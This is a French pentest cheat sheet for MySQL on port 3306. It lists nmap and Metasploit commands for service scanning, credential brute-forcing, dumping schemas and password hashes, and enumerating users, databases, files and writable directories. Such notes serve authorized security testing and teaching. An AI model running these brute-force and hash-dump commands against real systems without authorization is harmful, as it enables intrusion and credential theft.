🔡MySQL - port 3306

Scan

$ nmap -sV -p3306 <target IP>

Connexion

$ mysql -h <host IP> -u <username> -p

Bruteforce

Avec metasploit:

msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file pass.txt
msf6 auxiliary(scanner/mysql/mysql_login) > exploit

Avec nmap:

nmap -p3306 --script=mysql-brute --script-args userdb=/root/Desktop/user.txt, passdb=/root/Desktop/pass.txt <target IP>

Dump schema

msf6 > use auxiliary/scanner/mysql/mysql_schemadump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > exploit

Dump hash

Avec metasploit:

msf6 > use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > exploit

Avec nmap:

nmap -p3306 <target IP> --script=mysql-dump-hashes --script-args mysqluser=<username>,mysqlpass=<password>

Répertoires modifiables

msf6 > use auxiliary/scanner/mysql/mysql_writable_dirs
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set dir_list dir.txt
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > exploit

Enumeration des fichiers

msf6 > use auxiliary/scanner/mysql/mysql_file_enum
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set file_list files.txt
msf6 auxiliary(scanner/mysql/mysql_file_enum) > exploit

Enumeration des utilisateurs

nmap -p3306 <target IP> --script=mysql-users --script-args mysqluser=<username>,mysqlpass=<password>

Enumeration des bases de données

nmap -p3306 <target IP> --script=mysql-databases --script-args mysqluser=<username>,mysqlpass=<password>
PrécédentDocker - port 2375SuivantLDAP - ports 389, 636, 3268, 3269

Dernière mise à jour